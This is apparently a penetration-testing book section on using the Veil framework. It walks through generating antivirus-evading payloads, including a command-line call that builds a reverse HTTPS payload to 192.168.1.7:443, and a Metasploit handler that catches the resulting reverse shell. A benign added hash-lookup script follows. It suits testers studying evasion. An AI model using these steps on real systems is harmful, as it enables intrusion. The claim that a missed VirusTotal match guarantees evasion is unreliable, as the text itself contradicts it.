Using the Veil framework

The Veil framework is another AV-evasion framework. Written by Chris Truncer and also known as Veil-Evasion (www.veil-framework.com), it produces standalone exploit payloads that testers use to evaluate how well the protection and detection deployed on endpoints and servers hold up. The latest version of the Veil framework, as of December 2018, is 3.1.11. The framework consists of two tools: Evasion and Ordnance.

Evasion aggregates various evasion techniques into a single framework that simplifies their management, and Ordnance generates the shellcode for the supported payloads, which can then be used to build new exploits for known vulnerabilities.

As a framework, Veil possesses several features, which include the following:

  • It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python.
  • It can use Metasploit-generated shellcode, or you can create your own using Ordnance.
  • It can integrate third-party tools such as Hyperion (which encrypts an EXE file with AES 128-bit encryption), PEScrambler, and BackDoor Factory.
  • Payloads can be generated and seamlessly substituted into all PsExec, Python, and .exe calls.
  • Users have the ability to reuse shellcode or implement their own encryption methods.
  • Its functionality can be scripted to automate deployment.
  • Veil is under constant development and the framework has been extended with modules such as Veil-Evasion-Catapult (the payload delivery system).

Veil can generate an exploit payload; the standalone payloads include the following options:

  • A minimal Python installation that invokes shellcode: it uploads a minimal Python.zip installation and the 7-Zip binary, the Python environment is unzipped, and the shellcode is invoked. Because the only files that touch the victim are trusted Python libraries and the interpreter, the victim's AV does not detect any unusual activity.
  • The Sethc backdoor configures the victim's registry to launch the RDP sticky keys backdoor.
  • A PowerShell shellcode injector.

When the payloads have been created, they can be delivered to the target in one of the following two ways:

  • Upload and execute using Impacket and the PTH toolkit
  • UNC invocation

The Veil framework is available from the Kali repositories and is installed by simply entering apt-get install veil in the Terminal.

If you receive any errors during installation, rerun /usr/share/veil/config/setup.sh --force --silent.

Veil presents the user with the Main Menu, which offers the two tools to select from, the number of payload modules that have been loaded, and the available commands. Typing use Evasion switches to the Evasion tool, and the list command lists all the available payloads. The Veil framework's initial launch screen is shown in the following screenshot:

The Veil framework is undergoing rapid development, with significant releases on a monthly basis and important upgrades occurring more frequently. The Evasion tool presently offers 41 payloads designed to bypass antivirus by employing encryption or direct injection into memory. These payloads are shown in the following screenshot:

To obtain information on a specific payload, type info <payload number / payload name>, or type info and press Tab to autocomplete the available payloads. You can also simply enter the number from the list. In the following example, we entered 29 and selected the python/shellcode_inject/aes_encrypt payload by running use 29:

The exploit includes an expire_payload option: if the module is not executed by the target user within the specified timeframe, it is rendered inoperable. It also includes CLICKTRACK, which sets how many clicks the user has to make before the payload executes. Both options contribute to the stealthiness of the attack.

Some of the required options are pre-filled with default values and descriptions. If a required value has no default, the tester must supply one before the payload can be generated. To set the value of an option, enter set <option name> followed by the desired value. To accept the default options and create the exploit, type generate at the prompt.

If the payload uses shellcode, you will be presented with the shellcode menu, where you can select from the options listed in the following screenshot:

By default, Ordnance is used to generate the specific shellcode; if it fails, Veil falls back to msfvenom or to custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form \x01\x02, without quotes or newlines (\n). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press the Tab key to complete the available payloads. The available payloads are shown in the following screenshot:

In the following screenshot, the Tab key was used to display some of the available payloads; however, the default (windows/meterpreter/reverse_https) was selected:

The user is then presented with the output menu, with a prompt to choose the base name for the generated payload files. If the payload was Python-based and compile_to_exe was selected as an option, the user can choose between PyInstaller and Py2Exe to create the EXE file. Once generation of the EXE is complete, you should see the following:

The exploit could also have been created directly from the command line by using the following options:

kali@linux:~$ veil -t Evasion -p 29 --ordnance-payload rev_https --ip 192.168.1.7 --port 443 -o Outfile

Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample itself is submitted to VirusTotal and its behavior flags it as malicious software, antivirus vendors can release a signature update against the submission in as little as one hour. This is why users are clearly admonished with the don't submit samples to any online scanner! message.

Veil-Evasion allows testers to perform a safe check against VirusTotal. Whenever a payload is created, its SHA1 hash is computed and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit only these hashes to VirusTotal, which checks the SHA1 values against its malware database. If a Veil-Evasion payload triggers a match, the tester knows that it may be detected on the target system. If it does not trigger a match, the exploit payload will bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows:
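The following Python script is an added illustration of the hash-manifest workflow described above; it is not Veil's own checkvt code. It constructs two sample files in a temporary directory, records their SHA1 hashes in a hashes.txt manifest, and looks each hash up against a constructed local set that stands in for a scanner's database, so it runs offline. The sha1:filename line format and the function names are assumptions of this example, not Veil's.

```python
"""Hash-manifest lookup in the style of the checkvt workflow (added example).

Illustrative code, not Veil's checkvt script. The point of the pattern is
that only a hash leaves the tester's machine, never the sample itself.
"""
import hashlib
import os
import tempfile
from typing import Dict, Iterable, Set


def sha1_of_file(path: str, chunk_size: int = 1 << 16) -> str:
    """Return the lowercase hex SHA1 of a file, reading it in chunks."""
    digest = hashlib.sha1()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def write_hash_manifest(paths: Iterable[str], manifest_path: str) -> int:
    """Append one 'sha1:filename' line per file (assumed format); return lines written."""
    count = 0
    with open(manifest_path, "a", encoding="utf-8") as manifest:
        for path in paths:
            manifest.write(f"{sha1_of_file(path)}:{os.path.basename(path)}\n")
            count += 1
    return count


def lookup_hashes(manifest_path: str, known_hashes: Set[str]) -> Dict[str, bool]:
    """Map each filename in the manifest to True if its hash is already known."""
    results: Dict[str, bool] = {}
    with open(manifest_path, encoding="utf-8") as manifest:
        for line in manifest:
            line = line.strip()
            if not line:
                continue
            digest, _, name = line.partition(":")
            results[name] = digest.lower() in known_hashes
    return results


def demo() -> Dict[str, bool]:
    """Build two constructed files, hash them, and check them against a stand-in database."""
    with tempfile.TemporaryDirectory() as workdir:
        seen = os.path.join(workdir, "seen_sample.bin")
        fresh = os.path.join(workdir, "fresh_sample.bin")
        with open(seen, "wb") as fh:
            fh.write(b"constructed sample bytes A")
        with open(fresh, "wb") as fh:
            fh.write(b"constructed sample bytes B")
        manifest = os.path.join(workdir, "hashes.txt")
        write_hash_manifest([seen, fresh], manifest)
        # Constructed stand-in for the scanner's database: it has seen sample A only.
        known = {sha1_of_file(seen)}
        return lookup_hashes(manifest, known)


if __name__ == "__main__":
    for name, matched in demo().items():
        print(f"{name}: {'match (already known)' if matched else 'no match'}")
```

A hash match only proves that exactly those bytes have been seen before; a miss says nothing about heuristic or behavioural detection, since changing a single byte yields a different SHA1. For a defender this is also why hash-only blocklists are a weak control on their own and are best paired with behavioural telemetry.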

Testing thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software. To use the payload with the Metasploit framework, use exploit/multi/handler and set PAYLOAD to windows/meterpreter/reverse_https (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used for Veil-Evasion. When the listener is running, send the exploit to the target system. When the target launches it, it will establish a reverse shell back to the attacker's system.
